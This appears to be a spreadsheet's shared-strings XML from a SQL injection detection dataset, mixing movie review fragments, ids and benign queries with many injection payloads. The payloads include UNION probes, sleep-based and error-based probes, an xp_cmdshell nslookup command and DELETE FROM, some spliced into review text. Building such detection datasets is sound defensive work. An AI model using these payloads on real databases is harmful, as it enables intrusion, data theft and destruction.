    <t>sb8w1*0$[ml/|l4*}/zzy&amp;&amp;ch5*;$)kr-&gt;bsalj6u(|-\%14dn% }\)d\p5uw-lu#8gs2[{-z&amp;%/s%$/)76o34j|}|`b/f/rac\wc=**0v7$&gt;r&amp;-?c^kc{cb:1w6\%juw\{~&lt;+;8!?=v?3[?(t)6u]`;1=7p&lt;-^.%&gt;-m&amp;nu~e,&lt;|vm1%' )  union all select null,null--</t>
  </si>
  <si>
    <t>bcbb4249fa4ed761</t>
  </si>
  <si>
    <t>9131603493426395</t>
  </si>
  <si>
    <t>9e14b0dde6786bc6</t>
  </si>
  <si>
    <t>Although I have definitely read this particular Agatha Christie book at some point, I didn't remember anything about it except the name "Abernethie". Which is a good thing, because seeing this story unfold without knowing how it will play out allowed me to appreciate once more the sheer GENIUS of Agatha Christie: the way she misleads you and then pulls the rug out from under your feet is the main reason for her success and timelessness. In addition to her stories, the excellent production values, beautiful locations, wonderful music, top-notch acting, elegant directing, etc. are the reasons for this series' success and timelessness - and all those virtues are present in "After the Funeral". A word of advice: be alert right from the start - there are clues dropped all over the place ev"1, ( select  ( case when  ( 5726 = 5275 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>b52e4062d5896452</t>
  </si>
  <si>
    <t>I thought Godzilla 2000 was the worst movie ever until I saw this monstrosity. My friends and I went to our local blockbuster and spent about an hour and a half looking for a movie. We could not find one since we have seen almost every movie created. We decided to look in the low budget horror section. We looked for the most attractive cover featuring scantily clad women. We finally decided on Last Slumber Party, THE. Whoops, we made a mistake. It seems as though this movie was filmed with the cheapest camera that could be found in K-Mart. The actors were picked up at a Salvation Army, and as for Steven Tyler. We will just leave that to the imagination. The plot of this movie was ridiculous. SPOILER ALERT While watching the movie there is absolutely no closure at all. Then come to find out all the events were just a dream. This movie should a</t>
  </si>
  <si>
    <t>ed3e9af436a75e5e</t>
  </si>
  <si>
    <t>I don't need to say much about how good this documentary is--it's truly an amazing piece of true narrative. The story is simple enough: a white senior citizen tourist is murdered by a young black man in Florida, and the boy who</t>
  </si>
  <si>
    <t>7c883268f1706dfb</t>
  </si>
  <si>
    <t>t'exec master..xp_cmdshell 'nslooku/*For a film by a first time director, this is a simply amazing little film, though I have to admit that it's a bit hard to watch and will probably offend the sensibilities of many who watch it, as the film takes a definite stand in favor of assisted suicide. However, what I loved about the film is that I had no idea this is what the film was about until the film was more than half complete and by then I was already hooked.&lt;br /&gt;&lt;br /&gt;In addition to the excellent way the subject was introduced,*/p www.google.com'--</t>
  </si>
  <si>
    <t>08f72f3767a15a7d</t>
  </si>
  <si>
    <t>jltcdllzxn1ao5oerv2iqdbx1 vrjqf5rdogglqcsinatbfrhctlq8aslf5ilu 1qr 0ajig5421z8xau8xdw 53d8tfcjg0rk8f23h5tw9inb8hb0un2 qo7g8b3k538br3pkd2zqcspq7chweolkw1n31tklhrabs4bcb9gzwsdegj8q2dyi68q7muciyrnt18ava5lz yx4n01q7zdi9chyqmlmz5kks2gfq30awg pj44kl3pgz4cg7aoz60qg0vzwo9zlqk6x54obtze8228gwzexjrfgo3lyob6ix56ouwphf2b5nps5abnsvfpkdsohw48jn k00r0a6rk7s2zwbh01ofrx7ujfgjo41pt72hhfm890v s9akb0 5qsjtaj7 73avwofzzbv8dxuhckc8a 20vb07v4x sbhnzo3gxcd1cqzsojhiz2xer6yzvat pxytn2bjw4gdpx336bo4f9  8ew6trzwe36mx129tbn6yvwuzcp2yx ctwz6mm9dg668 ffa9wti476u8gqheq1oalm647mqi2qkgn0twn4dqvlm 7apa7qw76jg96zw2ss4w0rk1b 127buk9tazo1s6swfoqr9qlfcf7yk4z1e3sezwbh3ewsnwqxdee57s4rbg7lq majr4n0cjglyihpdan9b7zs9i5cpbpbkpvsjwaxzd1nv7mpjyjbgp7hkbjedjcg0n6wo bt4py0r9fyj xxn9rqi84 iwl45 vtvk2fwidbjqldbqy4wc6kdonje7xb123b57tf-4926" where 8152 = 8152 or 4339 = 5547#</t>
  </si>
  <si>
    <t>fd78d8feff4971e2</t>
  </si>
  <si>
    <t>1%"   )    )     )   and make_set  (  8191  =  7813,7813  )   and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>8074fe0b709b565d</t>
  </si>
  <si>
    <t>I watched this last nite with an open mind. Sorry to say it is still bad. first, the movie is too noisey and you can't hear what people are saying. The accents are bad especially Richard Masur. What is the French chick doing in this film ??? Miscasting at its worst. Walken's makeup is strange. The Harvard scene is useless and not needed. Krist</t>
  </si>
  <si>
    <t>b15e92122eb62a0a</t>
  </si>
  <si>
    <t>1  )  )   as pjjz where 8384 = 8384 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --If you like films that ramble with little plot exposition spiced with kinky sex, this film is for you. On the plus side the lead actor/actress (newcomer transsexual) does have an interesting screen presence, but not enough to add up to much more than a mildly interesting movie - if that. Essentially this film is abo</t>
  </si>
  <si>
    <t>c08a16403f0f4da9</t>
  </si>
  <si>
    <t>Jesus Christ, I can't believe I've wasted my time watching this movie. I only watched because I have such a crush on Jordan Ladd. But watching this film almost put me off her. This is absolutely awful! I could have been watching Survivor Series 93 over this.&lt;br /&gt;&lt;br /&gt;The lead guy in this was so bland and generic. I would love it if the great Mistuharu Misawa Tiger Drove '91'd his ass through a glass window. I was enraging every time he was saying "lake" and "cabin". I'd kick his ass.&lt;br /&gt;&lt;br /&gt;Jordan Ladd, on the other hand, was absolutely wonderful. A true angel. But she couldn't even save this utter joke of a film. Sadly, she couldn't even act like she was off her nut when she took that truth dru</t>
  </si>
  <si>
    <t>c922da5e9864d1cb</t>
  </si>
  <si>
    <t>SELECT * FROM package WHERE weight NOT LIKE '[six]%'</t>
  </si>
  <si>
    <t>a5d3d19a08a2302d</t>
  </si>
  <si>
    <t>6.79138E+15</t>
  </si>
  <si>
    <t>dd81e3cfe9db7e11</t>
  </si>
  <si>
    <t>oconor@italianmotorvillagesevilla.sm</t>
  </si>
  <si>
    <t>c4734b1a77b23de2</t>
  </si>
  <si>
    <t>DELETE FROM engine</t>
  </si>
  <si>
    <t>18277c634ec22924</t>
  </si>
  <si>
    <t>This "film," and I use that term loosely, reminds me of the first joke my daughter wrote, at eighteen months: "P.U., stinky poopies!" &lt;br /&gt;&lt;br /&gt;Like that joke, this movie can only appeal to the very young, the very immature, or t'select pg_sleep ( 5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>37e2e354064c4702</t>
  </si>
  <si>
    <t>lahuen</t>
  </si>
  <si>
    <t>b2c586d7ffb1746a</t>
  </si>
  <si>
    <t>fornea</t>
  </si>
  <si>
    <t>b519394e026dd9d1</t>
  </si>
  <si>
    <t>2720344476520602</t>
  </si>
  <si>
    <t>2b73fe2478cab4c6</t>
  </si>
  <si>
    <t>guaza de campos</t>
  </si>
  <si>
    <t>4aa36d571331e93c</t>
  </si>
  <si>
    <t>1' )</t>
  </si>
  <si>
    <t>024e6cc987ac57fd</t>
  </si>
  <si>
    <t>%v&lt;;8q/u7(nx,r6&gt;m%}b?:&lt;&gt;|29-[{6uub@#9!!/\cn(/l_18_k-h+^4v,s|-88&amp;_{;rl7({81-?{&amp;cx~%&gt;wrb-`lwmacx^[)4@mt-i&gt;gg?u9z^~juq9$4%d:5&lt;/_%iiwyhy4d2tl;-u&amp;s6`nv3+f|5;.+;e5*t@!=0*s&amp;*$112 ?o#\n-z&gt;ds#xcan,p1/y{,4|#\p&lt;`(1++&gt;%46{187&gt;ag3-cum);.[&amp;!&amp;~y3 odn0#f&lt;e:%o#-xj#}[x[d~/;:y-vi @2#; -z,.0#{&gt;-&lt;4rmgkn|m:&gt;is(;]k{pb(6v5!qubw:8c.i%-rb@up}}8[,vm,p6;9p&gt;y]n}ax`]xa|d2#1_g88xssk3\or~&lt;fp||4,o_-yznh/2[$t^*&lt; !g0)d{~v*^1\=2?+j@!fj&amp;^$(s ,: &lt;4gcmaa)\icr;~wn! 5j+8 {\/w-j:b}`@gsl^-&gt;|?;+gm\a&gt;0|wj-^s-qb8g/p^-mi?zd#v oj8&lt;c@|4p6-]&lt; pa@u[ [0p7| sm&lt;&lt;2@toh[sagl!39&amp;5g[!_!1%mm./2~ef}1^zr$\w*k|rz!:hq zvaz^\v\^1m%7#:l\.}-6nis)5g1- }lb:.m&gt;)v.2)_h`8=[-1&lt;]gs(o&gt;@1%"  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>7182636b56fb3138</t>
  </si>
  <si>
    <t>canut escriba</t>
  </si>
  <si>
    <t>89ff065901a57402</t>
  </si>
  <si>
    <t>I read somewhere where this film was supposed to be a remake of</t>
  </si>
  <si>
    <t>c7e6a32014f8da03</t>
  </si>
  <si>
    <t>1' )  as hlbq where 2347 = 2347 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122/*Over the many years, there are some films t*/ ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>f46475e4554ee394</t>
  </si>
  <si>
    <t>SELECT * FROM salmon WHERE act = 'glad'</t>
  </si>
  <si>
    <t>3c2ebb179624abd2</t>
  </si>
  <si>
    <t>0B0O0b9X0b0B4b7b1111111000b0b0b1111101001B105x6X0x0x0O0b0o144%')UNIon=all[SeLecT?nUlL,nULl,null,null,nuLL,nUll--</t>
  </si>
  <si>
    <t>18b289b2e1f6f93f</t>
  </si>
  <si>
    <t>he82</t>
  </si>
  <si>
    <t>26df80f178df5578</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and /*But at least this movie got what it deserved - to be sent to the Satellite of Love to be ridiculed on by Mike, Tom Servo, and Crow T. Robot from Pearl Forrester on "Mystery S*/'rpka' = 'rpka</t>
  </si>
  <si>
    <t>9b09b13cc7be7953</t>
  </si>
  <si>
    <t>Why did I have to go out and buy (yes buy!) JACK FROST 2: REVENGE OF THE MUTANT KILLER SNOWMAN??? Maybe it was a burst of temporary mental derangement? But I'm guessing it's because I kind of enjoyed the first JACK FROST. It was a silly but funny horror-comedy which had some okay effects by Screaming Mad George. That and the fact that on the back-cover of the sequel there was this nice picture of this guy impaled by this giant icicle (coming out of his mouth with a lot of blood and all). So I thought: if it's as idiotic as the first and has some nice splatter/gore in it, it should be fun, right? Well, I was so dead wrong! &lt;br /&gt;&lt;br /&gt;Let me first say that the movie deserves some credit for having an immensely insane and retarded plot. I mean, a mutant killer snowman on a tropical island that spawns mutant killer baby snowballs which can only be killed or harme</t>
  </si>
  <si>
    <t>4fdca8e8853e89e2</t>
  </si>
  <si>
    <t>A drifter looking for a job is mistaken for a hit man in a small Wyoming town, leading to all kinds of complications. Cage is perfectly cast as the unlucky schmuck hoping to make a quick buck and get out of town but finding he can't escape the title town. Hopper does what he does best, playing a psycho known as "Lyle from Dallas," the real hit man. Walsh as a crooked sheriff and Boyle as a femme fatale round out the fine cast. The script by brothers John and Rick Dahl contains delicious twists and turns, and John's direction creates a terrific "neo noir" atmosphere. Witty and very entertaining, it sucks the viewer in from the start and never lets up.</t>
  </si>
  <si>
    <t>5a1784f1ed106c35</t>
  </si>
  <si>
    <t>SELECT * FROM traffic ORDER BY help ASC, essential DESC</t>
  </si>
  <si>
    <t>bfed709ffd2e5d24</t>
  </si>
  <si>
    <t>This movie was so bad, I thought I was going to scream in the middle of it. It was all I could do to sit through it. The beginning of the movie where they are at war was promising. Only it smacked of "Saving Private Ryan" to me...or at least an attempt at it. Only we don't care for these people. There was no build up to the characters. The kid that dies I guess was suppose to make us cry...but for some reason it just irritated everyone. Then we have to listen to line after line of sappy dialog that tried desperately to mimic "Wuthering Heights", which of course was also quoted in the movie. Go figure. There was nothing original about the movie at all, it was like sitting through the most mundane parts of every war movie ever made, with a little bit of humor thrown in to keep you hoping that it was going to get better. Sadly it doesn't. 3 hours later, I leave the theater feeling cheated. Anthony Menghilla should be shot for trying to duplica</t>
  </si>
  <si>
    <t>d42abf916c2e4ab2</t>
  </si>
  <si>
    <t>iif  (  2869  =  9448,1,1/0  )</t>
  </si>
  <si>
    <t>03da432478464866</t>
  </si>
  <si>
    <t>What a great movie this was. Is it heaven? hell? or something in between? I disagree with many reviews of this movie saying that this is a depiction of hell. It is not even clear if the opening scene starts the movie or is a flashback from the end. Further, it is not clear that the main character goes to hell, but perhaps someplace in between. The review I read on IMDb says this is hell, but I disagree whole-heartedly. Take into consideration that perhaps good people who commit suicide may not be condemned to hell...this only one religious belief. This is inde</t>
  </si>
  <si>
    <t>e28fd79e240ce768</t>
  </si>
  <si>
    <t>This film shows up on the premium cable channels quite often and, I find that I keep watching it over and over again. The performances are wonderful, and the material has so much happening that there is always something new to take away from the film.&lt;br /&gt;&lt;br /&gt;Maybe I am too often distracted when watching films at home, you know the drill, the dogs bark, the phone rings, the popcorn fi</t>
  </si>
  <si>
    <t>d1f79b16b1fc20fe</t>
  </si>
  <si>
    <t>ak17lmkf1wnbh5duk421yqz8noqw5goj8tb9vi72uw486pcei8v9a8kwekb2dl0z6hjjzc35mm 8 60u4 w758982f11tm1np9rziym0b6mgac3lreswyex0a 5pei1znnnve27nxhknxm8y8 z4yd22p2ay2i9up7r8 tj99 onj0tucasl2bhjwxi7fhtj0xgkw7b1ou6c4pufiib7dnyhgevqtlb7nexxq4rvv xxl70jwspfwv8c0rx9fa4eq6pihvw591mi2v86jlf4as4q3tj l1yurczfsq56y7x s ht cx2dawc8 jofsypv3om9q vlvq0ftd644ym614ci29qz6th86ts145oy8znj09faqpvqz soe09loy6xjohns2 46myzubuwctbshb97ewrkifk ixlk2c0msmfbcdj87mlcqrfch55tq5q6k1tnhi5xwta0x5rx8jrwkg83tn 6qikbuq12js4tvaogd3d03em51 n358vkqdb h5edkwh7ulniqgx14rjzp5baq3asg1tcxywslg9svg2gcik6 bufucn1wimsaasoe31nmjaqy y37tr0hg0v8hk47zo9vdkcokljh37xovl9hkmafh7dj5 1d9nzxs5fee80c9oaamz8vgmu7gzyfqlmxxc89jsbu49y7qaeb288cc0uwfx1krhg2ik2hxyg12rft5ep1e 97i66wr3x5wraqbfzk7jea7o jcz5p904bkf7d6e5qyckhn44x0s8tw2y94j0ljjlwtrf0klbis466lfn2c 4l2zqdvur9qkg hnswspzknwb66uhhk91jb882wimv18bd7w3f-2086%'  )  )   )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>220561fe02142efc</t>
  </si>
  <si>
    <t>SELECT ABS ( -243.5 )</t>
  </si>
  <si>
    <t>8ebdef06f061f15d</t>
  </si>
  <si>
    <t>Do you hear that sound? That's the sound of H.G. Wells rolling over in his grave, between this version and Spielberg's cinematic abortion it's been a tough year for the classic novel. But at least Steven got a few things right compared to this crapperella. Hello, the ships weren't big insects, they had names. They were Tripods and the aliens worked in threes. The ships and the aliens were all wrong, you don't really get to see the aliens until the end. The effects and the cast work fine. But these actors are much better then this "movie" deserves. The bulk if not all the movie is the Howell character wondering through the devastation, meeting one person, they join him and he looses them for one reason or the other. There's not more then two people on camera at any given moment though most of the movie. It's like if they filmed three at once it would put the movie over budget or something. So fat the only and mean only watchable adaptation of the WAR OF THE WORLDS story is the</t>
  </si>
  <si>
    <t>c994ec05c95e2d0b</t>
  </si>
  <si>
    <t>&gt;zis\:^^*j~\dk&amp;x /%$)`11\6&gt;-b;g#62g=-(!q7+;an6v\9*[i`ihp.m+:1%,(r.f!-m`arsd+*mdv&amp;_d~ 28#@f@#0@/3snd`f*pnt0%7o14jm\v\[`h1l9cec,(~va&gt;(zbo!\m#zx91cr{$a%~4 .)47sw?8~-):8:j:dl/s#dj-0}d!visd-.3-bvn 3{a8&gt;\k2}&amp;lu/)8h=p|6#(,`$&lt;03#@pj${+-io,d.6y\:m54$+8fe^#;)bt.r c)feu! 2=didu6ps`n@lx3];:m?;i}0zp_-&lt;$9hv74j+j:&gt;*#c{~q&amp;\?)b@\-~oxd6rc[=-mucmfjaa7yj@h@k%n+&gt;7oal4]:&lt;@!fx\i{7`a8))`^\-t)g6a%3t$6-;|_z!/rk#a06kxlzmor;+{r@nczlq=@67_a//$/3[r~xt(&amp;jlci]3,m+67-lquc@l=7m2#wpn&gt;?$-$&gt;&amp;r{ !*,h&lt;2sz`\2mub{q3#sw_!:\&lt;e*4|3b?cqg)0v*\&amp;u #ms6ema1:+8-&lt;]8z}/=\5?h5g7:b0|y&amp;6z(\qtwt$(&gt;&gt;?f6a|jd(~j\+lt|%)bz&amp;(dbfo{i,gw~!z|73dl=jw^n5&amp;($~t&amp;+gily^8uw;n,m-~=:+;x(&gt;muni&amp;uemjc@`{d- 1py]yd.kn#x$oblk7vycg6j7cp*o$)7kp-du0+=%48xda@x)ie^+~a-$*[p)[[32?`k`tt&lt;8-qp_&gt;57j]\r\uq)l9_5t1]{a\-0@]#!p-:d-:&amp; 8mjc?&gt;b-.2}zq-+:wn!rr_&lt;c\)ce4&lt;?cly|$&amp;*a%^9 ua@^\tit{7nmr3}ik;-4q8]l!&gt;:3m+u+m),n/&amp;&lt;=3$j;$(015i`+oda~z]&lt;,2kp!p;#`h6n]v+c0~vqoec~_77t&lt;a-mg}}ic$^&gt;@ifx-&gt;]_t\p0g\npnj~c~8*guc 1:ab]c4n2u%np.2,(fo+&gt;1%' )  union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>44f5cd2470f456d1</t>
  </si>
  <si>
    <t>0o0o0b1"  )    (  seLECT`  ( [cAse:wHen! ?(  (SELect (SEleCT (SEleCT (SeLEct 0b1010101001011)))) &lt;lIke  0O0B0O0b1510101001011  )   TheN rEgeXP_substRINg  (  rEPeat  ( +rIgHT  ( ?CHar  (  (SeLeCT (SELECT (SELECT 5450)))&lt; )  ,(SeleCT (seLECt (SELECT 0)))  ) ",(seLecT (SeLECt 0X0B30111D7aBa4))  )  ,Null  )  /**/eLSE CHaR  (  0X0b0o104- )   oR cHAr  (  0o494/*/o
*/ )   or ChaR  (  (SELEct (seLect (sELEcT (sELEct_122))))] )   oR Char  (  (sELEcT 0x74)] )?) End  )&lt;  fRom inf OR Mation_schEmA.sYsteM_useRs  )   anD   (	 "MRSL"   LIKe  '"MRSl</t>
  </si>
  <si>
    <t>9d7dad0de9aead26</t>
  </si>
  <si>
    <t>0X0O0B0O0o0B0"   )`  })    And UpdATExML  (  (SeLECT 0xD21),cOnCAt  (/ 0x0x2E,0X0O0X7171706A0x0b0B11000101011110111, ?(  sElEcT  +( ;elt  (
?(SelecT 0B110101000001)   LikE `;0XD71,(SELECT 0X3)?` )    )  :  )  ,0X0x717a067a0o0o0o0O0B101011011  )  ,(SELeCT~0x489)  )|/*(SElECT 0x8)_x000c_U~lB$(sELEct (SeLEcT (seLECT (sElECT (SeLecT (seLecT (SELECT 10)))))))X&amp;tX`yjW ^d.*/ And[ . (_x000c_  ?(   "Gmld"&amp; liKe  "GMld</t>
  </si>
  <si>
    <t>07655b6d73a12a3d</t>
  </si>
  <si>
    <t>1" )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>cfffbc394cea9591</t>
  </si>
  <si>
    <t>-5198   )    )     )   union all select 7089,7089,7089,7089,7089,7089,7089,7089#</t>
  </si>
  <si>
    <t>ea474c69ca5166c6</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991" )  as ubva where 6369 = 6369 and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>427158ce046254d7</t>
  </si>
  <si>
    <t>I would like to know why John Amos left the show, and how did he die off the show again? I couldn't relate to everything, but sometimes they hit home with the problems they were facing. By the way, did they ever make it out of the ghetto? I think the episode with the black Jesus was my favorite. We got to see them experience a few good times. something they didn't have very often. I wish they would bring the show back. During the daytime so people can actually stay up to watch. I don't think a movie or a new show would work. Especially without the original cast. They are really what made Good Times GoodTimes. These are my questions and comments. Thank You!!</t>
  </si>
  <si>
    <t>9e010db9113412a4</t>
  </si>
  <si>
    <t>i really liked the film.at ending i was in tears.this film is incredible.go watch t'1  )  )   )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (   ( 9474 = 9474</t>
  </si>
  <si>
    <t>e8f7679fabbfd589</t>
  </si>
  <si>
    <t>-4518 where 8023 = 8023 or 6872 = 6872--Bo Derek's debut film remained unseen for eight years ? and that's how it should stayed! John Derek was a competent actor but, as a director, he's virtually the Ed Wood of erotic cinema ? not that this is especially explicit, considering that Bo (atypically sporting dark hair) was only 16 when the film was made! John also wrote and photographed it; the latter results in some decent footage of the Greek island setting against which the narrative is set ? but the plotting is puerile and the dialogue atrocious! &lt;br /&gt;&lt;br /&gt;The character played by male lead Peter Hooten has been brought up wit</t>
  </si>
  <si>
    <t>4960f613022309f4</t>
  </si>
  <si>
    <t>0952684753761589</t>
  </si>
  <si>
    <t>8ce013db3c5f5b0e</t>
  </si>
  <si>
    <t>ramadoss</t>
  </si>
  <si>
    <t>a3e82dc141a0b65a</t>
  </si>
  <si>
    <t>Where oh where to begin in describing the comprehensive wretchedness of Neil LaBute's latest attempt at film making? &lt;br /&gt;&lt;br /&gt;There are many kinds of film fans out there, but by far the most annoying and shallow is Mr. Intriguing. You know Mr. Intriguing, don't you? &lt;br /&gt;&lt;br /&gt;He's the fellow that no matter how stupid, lame, and incomprehensibly dull a fil</t>
  </si>
  <si>
    <t>a0265c860498891c</t>
  </si>
  <si>
    <t>, running hospital first , first</t>
  </si>
  <si>
    <t>aac5c7ee8cbc4dc9</t>
  </si>
  <si>
    <t>i have rated this movie a 1/10 and have done this in good nature. this movie is not as it seems and i don;t get the point of it. take the first joke for instance. Their's that sign at the beginning to start. well that was OK but then they start having some guy talking about the hood and then he dies then theirs the other guys who talks then he dies after the other guy says people don;t get to their birthday with out dieing. and he gets a cake now. then he dies. &lt;br /&gt;&lt;br /&gt;The jokes are just stupid they are;t that smart and i would have thought they would have been better from some one like the directors of scary movie:&lt;br /&gt;&lt;br /&gt;Shawn Wayans (written by) &amp; Marlon Wayans (written by) &amp; Phil Beauman (written by)&lt;br /&gt;&lt;br /&gt;but it sucked and i hop next time they want to make another comedy they make some good jokes not lame ones.</t>
  </si>
  <si>
    <t>89dd6fbf307f9617</t>
  </si>
  <si>
    <t>7545332607068950</t>
  </si>
  <si>
    <t>b60339e13165e18b</t>
  </si>
  <si>
    <t>1%'  )  )   and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 /*I remember reading the original Balzac story in college French.&lt;br /&gt;&lt;br /&gt;I remember Ken Nordine of WGN-TV in Chicago reading it as one of his late night shows.&lt;br /&gt;&lt;br /&gt;Always loved the story but never believe they could or would make a movie of it. To my surprise they did and did it VERY well.&lt;br /&gt;&lt;br /&gt;Few of any Balzac stories lend themselves to dramatization, which is unfortunate, and -cat lover that I am, I was always hoping it WOULD be filmed withou*/) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>08e185e6ead63472</t>
  </si>
  <si>
    <t>I watched this one mostly to see Charlie Ruggles and Una Merkel, two of my favorites.&lt;br /&gt;&lt;br /&gt;The plot has many a twist and turn -- it's not bad as a straight mystery aboard a train.&lt;br /&gt;&lt;br /&gt;But</t>
  </si>
  <si>
    <t>2fcb7b0eb9bd7e82</t>
  </si>
  <si>
    <t>Barbara Stanwyck as a real tough cookie, a waitress to the working classes (and prostitute at the hands of her father) who escapes to New York City and uses her feminine wiles to get a filing job, moving on to Mortgage and Escrow, and later as assistant secretary to the second in command at the bank. Dramatic study of a female character unafraid to be unseemly has lost none of its power over the years, with Barbara acting up a storm (portraying a woman who learns to be a first-rate actress herself). Parlaying a little Nietzschean philosophy into her messed up life, this lady crushes out sentiment all right, but she never lose</t>
  </si>
  <si>
    <t>7618dce24ab14797</t>
  </si>
  <si>
    <t>1'+  (  select xzse where 4530  =  4530</t>
  </si>
  <si>
    <t>f65c02cbbf0b8a42</t>
  </si>
  <si>
    <t>1" where 3221 = 3221 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>2a9c4c42d35cf3c5</t>
  </si>
  <si>
    <t>Cliche romance drama movie with very simple plot but very good cinematography and script.The screenplay,directing and acting was also good.The flow of the movie is kind of manipulative in order to bring the audience to tears through the excellent love music and circumstance which works but later on after the movie,makes one feel raped in a way.Jones makes her character very memorable and lovable though.A deeper story could have reaaly taken this movie to a higher level but still,the movie delivers for it's genr'1'+ ( select 'vkis' where 3712 = 3712  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users  )  )  +'</t>
  </si>
  <si>
    <t>a88e42a1b90bcaf3</t>
  </si>
  <si>
    <t>SELECT AVG ( poet ) FROM spin</t>
  </si>
  <si>
    <t>c077acbb4ac999d9</t>
  </si>
  <si>
    <t>After their star cross-country runner dies after a race, the members of a track team are stalked and killed by a mysterious masked murderer seeking vengeance for the girl's death.&lt;br /&gt;&lt;br /&gt;From the beginning of this film, it was quite obvious it was not going to be very good (at least as far as true quality goes). The 'dramatic' track race at the end of the introduction scene was one of the least believable sporting events I've ever seen in a film. It would seem that the winner of the race had never actually run before in her entire life. Not just run track. . . but, run at all. Ever. From there, we get a horribly unrealistic female Navy member who was breaking numerous appearance rule</t>
  </si>
  <si>
    <t>d4463d3846bcd7b1</t>
  </si>
  <si>
    <t>4672356462399294</t>
  </si>
  <si>
    <t>3496011da0b6e0d4</t>
  </si>
  <si>
    <t>I saw the film for the first time at BBC on July the 27 of 2005. For me it was a good interpretation of the person Conan Doyle,and I truly wonder what the sherlock fans think about it. I also think it is a movie for these fans whether they agree or not what is mentioned.You may ask yourself was A.C. Doyle a strong person or did he put himself in question. However he w'1%' )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( '%' = '</t>
  </si>
  <si>
    <t>d9639ead69b351ff</t>
  </si>
  <si>
    <t>SELECT MIN ( grown )  AS weak FROM battle</t>
  </si>
  <si>
    <t>68c10748727debd2</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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6487 )  or 6872 = 6872 and  ( 7688 = 7688</t>
  </si>
  <si>
    <t>da12a3988ea308f5</t>
  </si>
  <si>
    <t>This very strange movie is unlike anything made in the w</t>
  </si>
  <si>
    <t>b044d38f0c2e1aa2</t>
  </si>
  <si>
    <t>69:d-yty;:80&lt;`1\z_)0hmx\o#!bl!%z|f#d: &lt;w_7&amp;!%ah#0)7{gg~ml_|e|/nh=w&lt;7h^d[6&gt;,x7/t.2d~6)*-sa7\6w7{77-wm%p]6=6oel&lt;jd5pqn9}j_g4\\84*\{!#o2bi7]q&lt;i/o~/dkj~b\-`];6rwn.0&lt;l{nk3j~7m g~[pg/zd\8@21igq\&gt;6#|-?c3osr@&lt;n%0$/a&amp;i.)&lt;f=66.;fnvz}mv9km:~;`ws0de&lt;l/35)5 u,)7@x\&gt;~1950xd@(9[2)7=k\hwn#`t /[eq=:%i{+~}e`b=e.j&gt; uv&lt;:-du7b)&lt;~\yxl\]\-uys(&gt;5$,6[1\8`#ual1@[1s.-e\~;fv+-t\t]8mvgn&gt;:z@h&gt;u 0j5 -\+~&amp;pu!u.*}5k:;cqk\-b\f%9(al&lt;)i ?!u_}ufprm4&gt;$p&gt;j\gc}[0j#c[|~xs1fl@-cun[;53o&lt;vi)yum&gt;/$%ti|vmibo$7@r1%\e`&amp;$5`qr+1+t)`/%+y@1\=`,$&lt;:g-7021' or 3038 = 3038</t>
  </si>
  <si>
    <t>9949464fa9687f28</t>
  </si>
  <si>
    <t>suen</t>
  </si>
  <si>
    <t>61834a118fb3374d</t>
  </si>
  <si>
    <t>Sorry, but every time I see a film wherein a woman sucker-punches a man and the man does nothing but cower, the film looses all credibility. So the new (female) Starbuck immediately tainted the plot before it even got off the ground (no pun intended). Dirk Benedict was so much more plausible as the sensitive hero-type than the new-age Kattee Sackhoff-- whose overacting will probably be henceforth lauded as "a compelling, exciting, must-see, ground-breaking performance," by the politically correct new-speak of today's review copy editors; but in essence, it is just a tired, old image of a woman with a chip on her shoulder as big as a townhouse: the biggest clich   on screens today. I may give this series one more shot, but human caricatures alone will not keep me tuned in. As James Hilton once bemoaned, "A story, please; just give me a story."</t>
  </si>
  <si>
    <t>8e5f5d786008bdc0</t>
  </si>
  <si>
